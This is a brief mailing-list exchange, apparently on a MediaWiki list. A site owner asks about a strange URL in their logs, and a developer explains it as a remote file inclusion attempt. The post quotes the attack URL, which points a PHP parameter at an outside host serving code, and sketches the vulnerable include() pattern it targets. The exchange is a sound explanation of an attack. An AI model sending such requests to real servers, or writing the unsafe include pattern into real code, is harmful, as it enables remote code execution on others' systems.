S.C.A.I. Tradizioni del Sud wrote:
Hi, watching my statistic I fount this Url: /index.php?pagina=http://pharoeste.net/x/out.gif?&cmd=id. You can view the code at http://pharoeste.net/x/out.gif?&cmd=id. What does it mean?
Looks like an attempt to explode unsafe PHP code that looks something like: <? # ... if($cmd == 'id') { include($pagina); } # ... ?>
This would download and execute the remote code in a default PHP configuration with allow_url_fopen on (in PHP 4.3.0 or later).
MediaWiki would not be affected by this, of course; it looks like it's targetting something else, perhaps Italian. :)
-- brion vibber (brion @ pobox.com)